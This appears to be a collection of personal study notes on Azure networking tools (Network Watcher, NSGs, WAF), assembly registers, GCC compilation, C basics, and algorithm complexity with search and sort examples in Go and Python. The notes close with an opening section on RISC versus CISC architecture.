        • Cost Protection - Provides Azure credits back to us if a successful DDoS attack results in extra costs due to infrastructure scale out.
        • WAF Discount - Offers a pricing discount for Azure WAF

Network Watcher

Introduction

Network Watcher is a collection of tools used to monitor and diagnose network connectivity in Azure. It focuses on monitoring the network health of IaaS services in Azure. Network Watcher is not suitable for monitoring PaaS services or performing web analytics. The tools in Network Watcher fall into two main categories - network monitoring and network diagnostics.

Network Watcher is a regional service, which means we must create a Network Watcher instance in each region we want to monitor. It is not enabled by default and must be enabled per region.

Tools

Network Monitoring Tools

Topology

  • The Topology tool provides a visual representation of the network resources in a subscription. The tool shows the resources in a subscription and the connections between them. The Topology tool can be used to understand the network architecture of a subscription, identify network security groups, and troubleshoot network connectivity issues.
  • The only requirement is to have a Network Watcher resource enabled in the same region as the vNet for which you want to create a topology map.
  • There is no additional cost for using the Topology Map.

Connection Monitor

  • Continuously monitor the connection between two endpoints.
  • Connection Monitor relies on agents that are installed on source endpoints to perform connectivity tests and collect data related to connection health. The agent simulates network traffic between source and destination to measure key metrics, such as latency.
  • The agent to install on the source endpoint depends on whether the source VM is running in Azure or on-premises. For Azure VMs, we can install the Network Watcher extension. For on-prem VMs, we can install the Azure Monitor Agent (AMA).
  • Stores results in Log Analytics
  • Connectivity checks can use HTTP, TCP, or ICMP

Network Diagnostics Tools

IP Flow Verify

  • Network Watcher IP flow verify checks if a packet is allowed or denied from a virtual machine based on 5-tuple information. The security group decision and the name of the rule that denied the packet will be returned
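
A sketch of running IP flow verify with Azure PowerShell, using the default per-region Network Watcher names that Azure creates and placeholder VM/IP values:

# 'NetworkWatcher_eastus' / 'NetworkWatcherRG' are the default names Azure uses for the regional instance
$nw = Get-AzNetworkWatcher -Name 'NetworkWatcher_eastus' -ResourceGroupName 'NetworkWatcherRG'
$vm = Get-AzVM -Name 'vm-web01' -ResourceGroupName 'rg-demo'

# Check whether inbound TCP 443 from a remote address would be allowed or denied, and by which rule
Test-AzNetworkWatcherIPFlow -NetworkWatcher $nw -TargetVirtualMachineId $vm.Id `
    -Direction Inbound -Protocol TCP -LocalIPAddress '10.0.1.4' -LocalPort '443' `
    -RemoteIPAddress '203.0.113.50' -RemotePort '60000'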

Next Hop

  • Next Hop provides the next hop from the target virtual machine to the destination IP address.

Connection Troubleshoot

  • Available from the Network Watcher blade or from the Virtual Machine blade
  • Similar to Connection Monitor, but allows you to monitor the connection between a VM and a destination IP address on-demand, rather than continuously
  • Can be used to check if a port is open at a destination
  • Only supports ICMP and TCP
  • If the endpoint to test is an Azure VM or VMSS instance, you need to install the Network Watcher extension.

Components

  • Source Types:
    • VM / VMSS
    • App Gateway
    • Bastion Host
  • Destination Types:
    • Virtual Machine
    • IP Address
  • You can choose to use IPv4 or IPv6, or both
  • You then specify the source and destination ports
  • You can also specify the protocol to use (TCP or ICMP)
  • Finally, you choose the type of Diagnostic Test to run:
    • Connectivity Test
    • Next Hop
    • NSG Diagnostic
    • Port Scanner

NSG Diagnostics

  • The Network Security Group Diagnostics tool provides detailed information to understand and debug the security configuration of your network. For a given source-destination pair, network security group diagnostics returns all network security groups that will be traversed, the rules that will be applied in each network security group, and the final allow/deny status for the flow.
  • The tool can be used to troubleshoot connectivity issues, understand the rules that are applied to a flow, and verify that the rules are correct.

NSG Flow Logs

  • NSG Flow Logs are a feature of Network Watcher that allows you to view information about ingress and egress IP traffic through a Network Security Group. The logs are stored in a storage account and can be viewed in the Azure portal or downloaded for further analysis.

Packet Capture

  • Packet capture allows you to create packet capture sessions to track traffic to and from a virtual machine. You can create a packet capture session on a VM, VMSS, or network interface. The packet capture session will capture all network traffic to and from the virtual machine or network interface. You can then download the packet capture file and analyze it using a network protocol analyzer.
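
A minimal Azure PowerShell sketch of starting a time-limited capture on a VM (the VM, storage account, and capture names are placeholder assumptions; the Network Watcher VM extension must already be installed on the target):

$nw = Get-AzNetworkWatcher -Name 'NetworkWatcher_eastus' -ResourceGroupName 'NetworkWatcherRG'
$vm = Get-AzVM -Name 'vm-web01' -ResourceGroupName 'rg-demo'
$sa = Get-AzStorageAccount -Name 'stcapturedemo' -ResourceGroupName 'rg-demo'

# Capture 60 seconds of traffic to/from the VM and write the capture file to the storage account
New-AzNetworkWatcherPacketCapture -NetworkWatcher $nw -TargetVirtualMachineId $vm.Id `
    -PacketCaptureName 'pc-demo' -StorageAccountId $sa.Id -TimeLimitInSeconds 60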

Network Security Groups

Introduction

  • Network Security Groups are access control lists that are attached to a virtual machine’s vNic or a subnet
  • By default, there are no inbound allow rules added to a NSG
  • NSG rules are stateful, meaning that if you allow traffic in one direction, the return traffic is automatically allowed
  • When you have rules applied to both subnet and vNic, the rules are combined. Any allow rules at the subnet level must also be allowed at the vNic level

Default Rules

  • There are 3 default inbound rules that are added to a NSG:

    • AllowVnetInBound - allow traffic within the vNet
    • AllowAzureLoadBalancerInBound - allow traffic from Azure Load Balancer
    • DenyAllInBound - deny all inbound traffic
  • There are 3 default outbound rules that are added to a NSG:

    • AllowVnetOutBound - allow traffic within the vNet
    • AllowInternetOutBound - allow traffic to the internet
    • DenyAllOutBound - deny all outbound traffic

Rule Priority

  • Rules are evaluated in priority order
  • The lower the number, the higher the priority
  • The default rules use priorities 65000, 65001, and 65500, so custom rules (priority 100 to 4096) are always evaluated first

Rule Types

  • There are 2 types of rules:
    • Default Rules - cannot be deleted
    • Custom Rules - can be added, modified, or deleted

Rule Properties

  • Name - name of the rule
  • Priority - determines the order in which rules are applied
  • Source/Destination - can be an IP address, CIDR block, service tag, or application security group
  • Protocol - TCP, UDP, or Any
  • Port Range - single port, range of ports, or * for all ports
  • Action - Allow or Deny
  • Direction - Inbound or Outbound
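
A minimal Azure PowerShell sketch that puts these properties together in a custom inbound rule and a new NSG (all names and the port are placeholder assumptions):

# Custom rule: allow inbound HTTPS from the internet, evaluated before the default rules
$rule = New-AzNetworkSecurityRuleConfig -Name 'allow-https-in' -Description 'Allow HTTPS from the internet' `
    -Access Allow -Protocol Tcp -Direction Inbound -Priority 100 `
    -SourceAddressPrefix 'Internet' -SourcePortRange '*' `
    -DestinationAddressPrefix '*' -DestinationPortRange '443'

# Create the NSG with the rule; associate it with a subnet or NIC afterwards
# (e.g., via Set-AzVirtualNetworkSubnetConfig -NetworkSecurityGroup $nsg)
$nsg = New-AzNetworkSecurityGroup -Name 'nsg-web' -ResourceGroupName 'rg-demo' -Location 'eastus' -SecurityRules $rule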

Source Types

  • IP Address - single IP address
  • CIDR Block - range of IP addresses
  • Service Tag - predefined tag for Azure services
  • Application Security Group - group of VMs that can be used as a source or destination

Service Tags

  • Internet - all IP addresses
  • VirtualNetwork - all IP addresses in the vNet
  • AzureLoadBalancer - all IP addresses of Azure Load Balancer
  • AzureTrafficManager - all IP addresses of Azure Traffic Manager
  • GatewayManager - all IP addresses of VPN Gateway
  • AzureMonitor - all IP addresses of Azure Monitor
  • Storage - all IP addresses of Azure Storage
  • SQL - all IP addresses of Azure SQL
  • AppService - all IP addresses of Azure App Service
  • ContainerRegistry - all IP addresses of Azure Container Registry
  • KeyVault - all IP addresses of Azure Key Vault
  • AzureBackup - all IP addresses of Azure Backup
  • AzureDNS - all IP addresses of Azure DNS
  • LogAnalytics - all IP addresses of Azure Log Analytics
  • EventHub - all IP addresses of Azure Event Hub
  • ServiceBus - all IP addresses of Azure Service Bus
  • AzureCosmosDB - all IP addresses of Azure Cosmos DB
  • AzureContainerInstance - all IP addresses of Azure Container Instance
  • etc….

Web Application Firewall

Introduction

  • Azure has a web application firewall integrated with two services: Azure Front Door and Azure Application Gateway.
  • A WAF is a security feature that protects web applications from common web vulnerabilities.

Rule Sets

  • OWASP Core Rule Set (CRS):
    • Can only be applied to Application Gateway WAF and not Front Door WAF
  • Microsoft Rule Set:
    • Can be applied to both Application Gateway WAF and Front Door WAF
    • Contains rules authored by the Microsoft Threat Intelligence Team, in addition to the OWASP CRS rules
    • Can only be applied to the Azure Front Door Premium SKU
  • Microsoft Bot Manager Rule Set:
    • Can be applied to both Application Gateway WAF and Front Door Premium (not Standard) WAF
    • Contains rules to protect against bot traffic, authored by the Microsoft Threat Intelligence Team

Assembly

Table of Contents

Syntaxes

  • There are 2 types of assembly language syntax in common use:

Intel

AT&T

Registers

  • Registers are small, fast storage areas on the CPU
  • In IA-32 architecture, there are 10 32-bit registers and 6 16-bit registers
  • Registers are grouped into 3 categories: general-purpose, control, and segment
    • general-purpose is further grouped into data, index, and pointer

General-Purpose Registers

Data Registers

  %eax: Accumulator, often used for arithmetic and return values.
  %ebx: Base register, used for extra storage.
  %ecx: Counter, often used in loops.
  %edx: Data register, often used for I/O operations.

Index registers

  %esi/%edi: Source and destination for data operations.

Pointer Registers

    %eip: stores the offset address of the next instruction to be executed. 
    %esp: Stack Pointer, points to the top of the stack.
    %ebp: Base Pointer, used for stack frame management.

Control Registers

Segment Registers

The 4 Steps of Compilation with GCC

GCC transforms source code into an executable file through four primary steps:


1. Preprocessing

  • What happens:
    • The preprocessor handles directives in the source code (e.g., #include, #define, #ifdef).
    • It replaces macros, includes header files, and resolves conditional compilation directives.
  • Input: .c source file.
  • Output: A preprocessed source file (usually with a .i or .ii extension).
  • Command:
    gcc -E file.c -o file.i
    
  • Example:
    • Converts:
      #include <stdio.h>
      #define PI 3.14
      printf("PI is %f\n", PI);
      
      Into:
      // Expanded header contents of stdio.h
      printf("PI is %f\n", 3.14);
      

2. Compilation

  • What happens:
    • The compiler translates the preprocessed source code into assembly language, specific to the target architecture.
  • Input: Preprocessed source file (.i or .ii).
  • Output: Assembly file (usually with a .s extension).
  • Command:
    gcc -S file.i -o file.s
    
  • Example:
    • Converts preprocessed code into assembly instructions like:
      movl $3.14, -4(%ebp)
      call printf
      

3. Assembly

  • What happens:
    • The assembler translates the assembly code into machine code, creating an object file.
  • Input: Assembly file (.s).
  • Output: Object file (.o or .obj).
  • Command:
    gcc -c file.s -o file.o
    
  • Example:
    • Produces a binary object file containing machine instructions that the CPU can execute.

4. Linking

  • What happens:
    • The linker combines object files and libraries to create an executable program.
    • Resolves symbols (e.g., function calls, global variables) across different object files.
  • Input: One or more object files (.o) and optional libraries.
  • Output: Executable file (e.g., a.out by default).
  • Command:
    gcc file.o -o file
    
  • Example:
    • Combines multiple .o files and links to the standard C library (libc) to produce a runnable executable.

Full Process with GCC

Running GCC without intermediate steps performs all four stages automatically:

gcc file.c -o file

C Programming Notes

Overview

  • C is a general-purpose, procedural computer programming language supporting structured programming, lexical variable scope, and recursion, with a static type system.
  • Every C program has a main() function that is the entry point of the program.
  • C is a compiled language, meaning that the source code is compiled into machine code before it is executed.
  • C is a low-level language, meaning that it is closer to machine code than high-level languages like Python or JavaScript.
  • C does not support object-oriented programming
  • C is a statically typed language, meaning that the type of a variable must be declared before it is used.

Comments

  • Single line comments are denoted by //
  • Multi-line comments are denoted by /* */

Importing Libraries

  • Libraries are imported using the #include directive

Variables

  • A variable scope is the region of code where a variable can be accessed.
  • In C, all variables must be declared before they are used.
  • Variables must be declared with a type and an optional initial value.
  • To declare a variable:
int x = 5;
unsigned int y = 10;

char c = 'a';

float f = 3.14;

double d = 3.14159;

int x[5] = {1, 2, 3, 4, 5};

struct Point {
    int x;
    int y;
};

Structs

  • A struct is a user-defined data type that groups related data together.
  • To declare a struct:
struct Point {
    int x;
    int y;
};
  • To create an instance of a struct:
struct Point p;
p.x = 10;
p.y = 20;
  • To create a pointer to a struct:
struct Point *ptr = &p;
  • To access a member of a struct using a pointer:
ptr->x = 30;
ptr->y = 40;

Strings

  • C does not support strings as a primitive type. Instead, strings are represented as arrays of characters. You can import the string.h library to use string functions.
  • To declare a string:
char str[10] = "Hello\0";
  • In the example above, we declare a character array str with a size of 10. The string “Hello” is stored in the array and terminated by the null character \0 (string literals are null-terminated automatically, so the explicit \0 here is redundant but harmless). The terminator marks the end of the string because the array may be larger than the string it contains.
  • C provides a string library with common functions for manipulating strings

Data Types

  • Basic data types in C include:
    • int: integer
    • char: character
    • float: floating-point number
    • double: double-precision floating-point number
    • void: no value
  • Modifiers can be used to modify the basic data types:
    • short: short integer
    • long: long integer
    • signed: signed integer
    • unsigned: unsigned integer
  • The sizeof() function can be used to determine the size of a data type in bytes.
  • The typedef keyword can be used to create custom data types.
  • C does not include boolean types by default. Instead, 0 is considered false and any other value is considered true.

Operators

  • Arithmetic operators: +, -, *, /, %
  • Relational operators: ==, !=, >, <, >=, <=
  • Logical Operators: &&, ||, !
  • Bitwise Operators: &, |, ^, ~, <<, >>

Line and Spacing Conventions

  • C is not whitespace sensitive, but it is good practice to use whitespace to make code more readable.
  • Statements in C are terminated by a semicolon ;
  • Blocks of code are enclosed in curly braces {}

Input and Output

  • The printf() function is used to print output to the console.
  • The scanf() function is used to read input from the console.
  • The getchar() function is used to read a single character from the console.
  • The putchar() function is used to print a single character to the console.
  • The gets() function is used to read a string from the console (it is unsafe and was removed in C11; prefer fgets()).
  • The puts() function is used to print a string to the console.

Conditionals

  • The if statement is used to execute a block of code if a condition is true.
  • The else statement is used to execute a block of code if the condition is false.
  • The else if statement is used to execute a block of code if the previous condition is false and the current condition is true.
  • Example:
int x = 10;
if (x > 5) {
    printf("x is greater than 5\n");
} else if (x == 5) {
    printf("x is equal to 5\n");
} else {
    printf("x is less than 5\n");
}

Loops

  • The for loop is used to execute a block of code a fixed number of times.
  • The while loop is used to execute a block of code as long as a condition is true.
  • The do while loop is similar to the while loop, but the condition is checked after the block of code is executed.

Examples

Hello World using a function from the math library

#include <stdio.h>
#include <math.h>

int main() {
    printf("Hello, World!\n");
    printf("The square root of 16 is %f\n", sqrt(16));
    return 0;
}
  • The main function returns a value of type int. By convention, a return value of 0 indicates that the program executed successfully.

Reading and printing an integer

#include <stdio.h>

int main() {
    int x;
    printf("Enter an integer: ");
    scanf("%d", &x);
    printf("You entered: %d\n", x);
    return 0;
}

Unions

  • A union is a user-defined data type that allows storing different data types in the same memory location.
  • The size of a union is determined by the size of its largest member.
  • A union can only store one member at a time.
  • To declare a union:
union Data {
    int i;
    float f;
    char str[20];
};

int main() {
    union Data data;
    data.i = 10;
    printf("data.i: %d\n", data.i);
}

the bufio package

scanner

A scanner is a convenient way of reading data delimited by new lines or spaces.

Go-projects

  • csv2json

  • wc (word count)

  • cat

  • pwd

  • hashy

  • httping

  • mdp

  • httpbench

  • http status codes

  • get-headers

  • noted

  • todo

  • dnsEnum

  • todo

  • password generator

  • csvpeek

  • theHarvester clone

  • apache log parser into json

  • nginx log parser into json

  • fstab formatter

  • generic upload service

  • dead-link checker

  • my own note syncing app - Sync notes to a github repo - display notes using tea

Immutability

Functional programming is more about declaring what you want to happen, rather than how you want it to happen.

Example:

return clean_windows(add_gas(create_car()))

Python is not great for functional programming, but the example above illustrates the concept. Reasons python is not great for functional programming:

  1. Lack of immutability: Functional programming relies heavily on immutable data structures, whereas Python’s built-in data structures (lists, dictionaries, sets) are mutable by default.
  2. Limited support for tail call optimization: Functional programming often uses recursion as a primary control structure, but Python does not optimize for tail calls, which can lead to stack overflow errors for deep recursions.
  3. Mixed paradigms: Python is a multi-paradigm language that supports both imperative and object-oriented programming, which can lead to less emphasis on functional programming principles.

The key distinction in the example (relative to imperative programming), is that we never change the value of the car variable. Instead, we compose functions that return new values based on the input value.

Immutability

In functional programming, we strive to make data immutable. Once a data structure is created, it cannot be mutated. Instead, any modification needed creates a new data structure.

Immutable data is easier to think about and work with. When 10 different functions are mutating the same data structure, it can be hard to track what the current state is. With immutability, you always know that the data structure you have is exactly what it was when it was created.

Generally speaking, immutability means fewer bugs and more maintainable code.
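
A minimal sketch of the difference in Python (the function and variable names are made up for illustration):
# Mutable approach: every caller holding a reference to `cart` sees it change.
cart = ["bread"]
cart.append("milk")              # mutates the original list in place

# Immutable approach: each "modification" returns a brand-new value,
# so the original is never changed.
def add_item(items: tuple, item: str) -> tuple:
    return items + (item,)       # builds a new tuple

original = ("bread",)
updated = add_item(original, "milk")

print(original)   # ('bread',)          -- unchanged
print(updated)    # ('bread', 'milk')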

Imperative-programming

Imperative programming is a programming paradigm where we declare what we want to happen, and how we want it to happen, step by step.

Example:

car = new_car()
car.add_gas(10)
car.clean_windows()

In the example above, we create a new car object and then modify its state by adding gas and cleaning the windows through a series of commands. Each step changes the state of the car object directly.

Computer Science

Directory Map

Measuring algorithm performance

Analyzing Algorithms

  • One way to judge an algorithm’s performance is by its runtime (wall-clock time). Another is CPU time (the time the algorithm actually spends running on the CPU). Neither is a reliable measure, as both vary from run to run and from machine to machine. Instead, computer scientists compare algorithms by looking at the number of steps they require.
  • You can input the number of steps involved in an algorithm into a formula that can compare two or more algorithms without considering the programming language or computer.
  • Let’s take a look at a simple example:
package main

import (
    "fmt"
)

func main() {
    arr := []int{1,2,3,4,5}
    for _, v := range arr {
        fmt.Println(v)
    }
}

The function above takes 5 steps to complete. You can express this with the following formula:

T(n) = 5

If you make the program more complicated, the formula will change. Let’s say you also wanted to keep a running total of the values as you printed them:

package main

import (
    "fmt"
)

func main() {
    var count int = 0
    arr := []int{1,2,3,4,5}
    for _, v := range arr {
        fmt.Println(v)
        count += v
    }
}

The formula for this program would now be:

T(n) = 11

The program takes 11 steps to complete. It first assigns the count variable the value 0. Then, for each of the five values, it prints the value and adds it to count (1 + 5 + 5 = 11).

It can be hard to determine how many steps a particular algorithm takes, especially in large programs and in functions/methods with many conditional statements. Luckily, you don’t need to care about how many steps an algorithm has. Instead, you should care about how the algorithm performs as n gets bigger.

Because the important part of an algorithm is the part that grows the fastest as n gets bigger, computer scientists use ‘Big O’ notation to express an algorithm’s efficiency instead of a T(n) equation. Big O notation is a mathematical notation that describes how an algorithm’s time or space requirements increase as the size of n increases. Computer scientists use Big O Notation to create an order-of-magnitude function from T(n). An order-of-magnitude is a class in a classification system where each class is many times greater or smaller than the one before. In an order-of-magnitude function, you use the part of T(n) that dominates the equation, and ignore everything else. The part of T(n) that dominates the equation is an algorithm’s order of magnitude.

These are the most commonly used classifications for order of magnitude in Big O Notation, sorted from best (most efficient) to worst (least efficient):

  1. Constant Time
  2. Logarithmic time
  3. Linear time
  4. Log-Linear time
  5. Quadratic time
  6. Cubic time
  7. Exponential time

Each order of magnitude describes an algorithm’s time complexity. Time complexity is the maximum number of steps an algorithm takes to complete as n gets bigger.

Order of magnitude classifications:

Constant Time

  • An algorithm runs in constant time when it requires the same number of steps regardless of the problem’s size. The Big O notation for constant time complexity is O(1). For example, let’s say you own a book store. Each day, you give the first customer of that day a free book. You may track this in a program using the following code:
free_book = customers_for_day[0]

The T(n) equation for this would be T(n) = 1

Your algorithm requires one step, no matter how many customers you have. When you graph a constant time complexity algorithm on a chart with the number of inputs on the x-axis and number of steps on the y-axis, the graph is a flat line.

Logarithmic Time

  • The second most efficient time complexity. An algorithm takes logarithmic time when its run time grows in proportion to the logarithm of the input size. You see this in algorithms such as a binary search that can discard many values at each iteration.
  • You express a logarithmic function in big O notation O(log n).
  • A logarithm is the power to which a base must be raised to produce a given number. In computer science, the base is assumed to be 2 unless otherwise specified (see the sketch below).
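
A minimal sketch of logarithmic growth (not tied to any particular algorithm): repeatedly halving n means the loop body runs roughly log2(n) times.
def count_halvings(n: int) -> int:
    """Count how many times n can be halved before reaching 1."""
    steps = 0
    while n > 1:
        n //= 2      # discard half of the remaining work each iteration
        steps += 1
    return steps

# Doubling the input only adds one extra step -- the hallmark of O(log n).
for size in (8, 16, 32, 1024):
    print(size, count_halvings(size))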

Linear Time

  • An algorithm that runs in linear time grows at the same rate as the size of the problem.
  • You express a linear algorithm in Big O notation O(n).
  • Suppose you modify your free book program so that instead of giving a free book to the first customer of the day, you iterate through your list of customers and give every customer whose name starts with the letter “B” a free book. The list of customers is not sorted, so you must check each customer one by one. When your customer list contains 5 items, your algorithm takes 5 steps; when it contains 10 items, it takes 10 steps, and so on (see the sketch below).
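
A minimal sketch of the free-book example described above (the customer names are made up):
customers = ["Blake", "Bob", "Ricky", "Beth", "Dave"]

free_book_winners = []
for customer in customers:          # one step per customer -> O(n)
    if customer.startswith("B"):
        free_book_winners.append(customer)

print(free_book_winners)  # ['Blake', 'Bob', 'Beth']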

Log-Linear Time

  • Log-linear time grows as a combination of logarithmic and linear time complexities. For example, a log-linear algorithm might evaluate an O(log n) operation n times. In Big O Notation, you express a log-linear algorithm as O(n log n). Log-Linear algorithms often divide a data set into smaller parts and process each piece independently.

Quadratic Time

  • An algorithm runs in quadratic time when its performance is directly proportional to the problem’s size squared. In big O notation, you express this as O(n^2)
  • Example:
numbers = [1,2,3,4,5]
for i in numbers:
    for j in numbers:
        x = i * j
        print(x)
  • As a general rule, if your algorithm contains two nested loops running from 1 to n, its time complexity will be at least O(n^2). Many sorting algorithms, such as insertion sort, use quadratic time.

Cubic Time

  • An algorithm runs in cubic time when its performance is directly proportional to the size of the problem cubed. This is expressed in Big O notation as O(n^3)
  • Example:
numbers = [1,2,3,4,5]
for i in numbers:
    for j in numbers:
        for h in numbers:
            x = i + j + h
            print(x)

Exponential Time

  • One of the worst time complexities
  • An algorithm that runs in exponential time contains a constant that is raised to the size of the problem.
  • Big O Notation: O(c^n)
  • Example:
pin = "931"
n = len(pin)
for i in range(10**n):
    if str(i) == pin:
        print(i)

Here we are trying to guess a 3-digit PIN by brute force. When n is 1, the algorithm takes 10 steps. When n is 2, the algorithm takes 100 steps. When n is 3, the algorithm takes 1,000 steps. It grows quickly.

Search Algorithms

Linear Search

  • Iterate through every item in a data set and compare it to the test case
  • Time complexity is O(n)
  • Consider using a linear search when the data is not sorted
package main

import "fmt"

func linearSearch(numbers []int, value int) bool {
    for _, v := range numbers {
       if v == value {
            return true
       } 
    }
    return false
}

func main() {
    nums := []int{1,50,34,20,10,54,23,65}
    fmt.Println(linearSearch(nums, 34))
}

Binary Search

  • Faster than a linear search
  • Only works when the data is sorted
  • A binary search searches for elements in a list by dividing the list into two halves. The first step is to locate the middle number. You then determine if the number you are looking for is less than or greater than the middle number. If the number you are looking for is greater, you continue searching numbers to the right of the middle number, repeating the process of splitting this new list into two. If the number you are looking for is less, you search the numbers to the left of the middle number, repeating this process.
  • Time complexity is O(log n)

package main

import "fmt"

func binarySearch(needle int, haystack []int) bool {

	low := 0
	high := len(haystack) - 1

	for low <= high{
		median := (low + high) / 2

		if haystack[median] < needle {
			low = median + 1
		}else{
			high = median - 1
		}
	}

	if low == len(haystack) || haystack[low] != needle {
		return false
	}

	return true
}


func main(){
	items := []int{1,2, 9, 20, 31, 45, 63, 70, 100}
	fmt.Println(binarySearch(63, items))
}

Sorting Algorithms

Bubble Sort
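
  • Bubble sort repeatedly steps through the list, compares adjacent elements, and swaps them if they are out of order; after each pass the largest remaining element ‘bubbles’ to the end of the list.
  • Like insertion sort, bubble sort is O(n^2), so it is only practical for small or nearly sorted lists.
  • A minimal sketch in Python:
def bubble_sort(a_list):
    n = len(a_list)
    for i in range(n - 1):
        swapped = False
        # after i passes, the last i elements are already in their final place
        for j in range(n - 1 - i):
            if a_list[j] > a_list[j + 1]:
                a_list[j], a_list[j + 1] = a_list[j + 1], a_list[j]  # swap
                swapped = True
        if not swapped:
            break  # no swaps this pass means the list is already sorted
    return a_list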

Insertion sort

  • Insertion sort is a sorting algorithm where you sort a list like you sort a deck of cards. Suppose you have the numbers [ 6,5,8,2 ]. You start with the second number in the list and compare it to the first. Since 5 is less than 6, you move 5 to the first position. You now compare the number in the third position (8) to the number in the second position. Because 8 is greater than 6, 8 does not move. Because you already sorted the first half of the list, you do not need to compare 8 to 5. You then compare the 4th number in the list (2), and because 8 is greater than 2, you go one by one through the sorted left half of the list, comparing 2 to each number until it arrives at the front and the entire list is sorted: 2,5,6,8
  • Example:
def insertion_sort(a_list):
    for i in range(len(a_list) - 1):
        current_position = i + 1

        while current_position > 0 and a_list[current_position - 1] > a_list[current_position]:
            # swap
            a_list[current_position], a_list[current_position - 1] = a_list[current_position - 1], a_list[current_position]
            current_position -= 1
    return a_list
  • Insertion sort is O(n^2), so it is not very efficient
  • Insertion sort can be efficient on a nearly sorted list

Merge Sort

  • A merge sort is a recursive divide-and-conquer sorting algorithm that continually splits a list in half until there are one or more lists containing one item and then puts them back together in the correct order. Steps:
    1. If the list is of length 1, return the list as it is already sorted by definition of the merge sort algorithm.
    2. If the list has more than one item, split the list into two halves.
    3. Recursively call the merge sort function on both halves.
    4. Merge the two sorted halves back together into one sorted list by comparing the front elements of each half and repeatedly appending the smaller one.

  • Lists containing only one item are sorted by definition.
  • A merge sort is a ‘divide and conquer’ algorithm. You recursively break a problem into two until they are simple enough to solve easily.
  • A merge sort’s time complexity is O(n * log n)
  • With log linear time complexity, a merge sort is one of the most efficient sorting algorithms
def merge_sort(nums):
    if len(nums) < 2:
        return nums

    mid = len(nums) // 2
    first_half = nums[:mid]
    second_half = nums[mid:]

    sorted_left_side = merge_sort(first_half)
    sorted_right_side = merge_sort(second_half)
    return merge(sorted_left_side, sorted_right_side)

def merge(first, second):
    final = []
    i = 0
    j = 0

    while i < len(first) and j < len(second):
        if first[i] <= second[j]:
            final.append(first[i])
            i += 1
        else:
            final.append(second[j])
            j += 1

    while i < len(first):
        final.append(first[i])
        i += 1

    while j < len(second):
        final.append(second[j])
        j += 1
        
    return final

Quick Sort

  • Like merge sort, quick sort is a recursive divide-and-conquer sorting algorithm. However, instead of splitting the list in half, quick sort selects a ‘pivot’ element from the list and partitions the other elements into two sub-arrays according to whether they are less than or greater than the pivot. The sub-arrays are then sorted recursively.
  • Quick sort will sort the list in-place, requiring only small additional amounts of memory to perform the sorting.
  • If the list has zero or one element, it is already sorted.
  • Quick sort will quickly degrade into O(n^2) time complexity if the pivot elements are poorly chosen. i.e. if the smallest or largest element is always chosen as the pivot in an already sorted list. However, with good pivot selection, quicksort can achieve average time complexity of O(n log n). To ensure good pivot selection, you can use techniques such as choosing the median element or using randomization.
def quick_sort(nums, low, high):
    if low < high:
        middle = partition(nums, low, high)

        quick_sort(nums, low, middle - 1)
        quick_sort(nums, middle + 1, high)

def partition(nums, low, high):
    pivot = nums[high] # get the last element in the list
    i = low - 1 # pointer for the smaller element

    for j in range(low, high):
        if nums[j] <= pivot:
            i += 1
            nums[i], nums[j] = nums[j], nums[i] # swap

    nums[i + 1], nums[high] = nums[high], nums[i + 1] # swap pivot element
    return i + 1

Selection Sort

  • Selection sort is similar to bubble sort in that it repeatedly swaps items in a list. However, it’s slightly more performant as it only makes one swap per iteration of the outer loop.
def selection_sort(a_list):
    for i in range(len(a_list)):
        smallest_index = i
        for j in range(i + 1, len(a_list)):
            if a_list[j] < a_list[smallest_index]:
                smallest_index = j
        a_list[i], a_list[smallest_index] = a_list[smallest_index], a_list[i] # swap

Polynomial vs Exponential Time Complexity

  • Broadly speaking, algorithms can be classified into two categories based on their time complexity: polynomial time and exponential time.
  • An algorithm runs in polynomial time if its runtime does not grow faster than n^k, where k is a constant (e.g. n^2, n^3, n^4) and n is the size of the input. Polynomial time algorithms can be practical as long as the exponent k is not too large.
  • Exponential time algorithms are almost always too slow to be practical.
  • The name for the set of Polynomial time algorithms is “P”. Problems that can be solved by polynomial time algorithms are called “tractable” problems. Problems that cannot be solved by polynomial time algorithms are called “intractable” problems.

Non-Deterministic Polynomial Time (NP)

  • Non-deterministic polynomial time (NP) is a complexity class describing the set of problems whose solutions can be verified in polynomial time but not necessarily found in polynomial time.

Examples

package main

func main() {

}

// O(1) describes an algorithm that will always execute in the same time (or space) regardless of the size of the input data set.
func returnFalse() bool {
        return false
}

// O(N) describes an algorithm whose performance will grow linearly and in direct proportion to the size of the input data set. The example below also demonstrates how Big O favours the worst-case performance scenario; a matching value could be found during any iteration of the for loop and the function would return early, but Big O notation will always assume the upper limit where the algorithm will perform the maximum number of iterations.
func containsValue(value int, intSlice []int) bool {
        for _, v := range intSlice {
                if v == value {
                        return true
                }
        }
        return false
}
}

// O(N²) represents an algorithm whose performance is directly proportional to the square of the size of the input data set. This is common with algorithms that involve nested iterations over the data set. Deeper nested iterations will result in O(N³), O(N⁴) etc.
func containsDuplicates(vals []string) bool {
        for i := 0; i < len(vals); i++ {
                for j := 0; j < len(vals); j++ {
                        if i == j {
                                continue
                        }
                        if vals[i] == vals[j] {
                                return true
                        }
                }
        }
        return false
}

// O(2^N) denotes an algorithm whose growth doubles with each addition to the input data set. The growth curve of an O(2^N) function is exponential — starting off very shallow, then rising meteorically. An example of an O(2^N) function is the recursive calculation of Fibonacci numbers:
func Fibonacci(number int) int {
        if number <= 1 {
                return number
        }

        return Fibonacci(number-2) + Fibonacci(number-1)
}

Computer Architecture

Table of Contents

  1. RISC vs CISC
  2. von Neumann Architecture Model
  3. Memory and Addressing
  4. The von Neumann Bottleneck
  5. Modern Innovations in Computer Architecture

RISC vs CISC

  • The CPU executes instructions that are stored in various memory layers throughout the computer system (RAM, caches, registers).
  • A particular CPU has an Instruction Set Architecture (ISA), which defines:
    • The set of instructions the CPU uses and their binary encoding.
    • The set of CPU registers.
    • The effects of executing instructions on the state of the processor.
    • Examples of ISAs include SPARC, ARM, x86, MIPS, and PowerPC.
    • A micro-architecture is a specific implementation of an ISA which can have different circuitry. AMD and Intel both produce x86 processors, but with different micro-architectures.

Key Differences Between RISC and CISC

  • RISC (Reduced Instruction Set Computer):

    • Small set of basic instructions that execute quickly, typically in a single clock cycle.
    • Simpler micro-architecture design, requiring fewer transistors.
    • Programs may contain more instructions, but execution is highly efficient.
    • Example: ARM processors, widely used in mobile devices.
  • CISC (Complex Instruction Set Computer):

    • Designed to execute more complex instructions, which often take multiple cycles.
    • Programs are smaller as they contain fewer instructions.
    • Example: x86 processors, dominant in desktops and servers.
  • General Observations:

    • RISC architectures excel in scenarios requiring high efficiency and low power, such as mobile devices.
    • CISC architectures dominate general-purpose computing due to compatibility with legacy software and complex operations.

von Neumann Architecture Model

  • All modern processors adhere to the von Neumann architecture model.
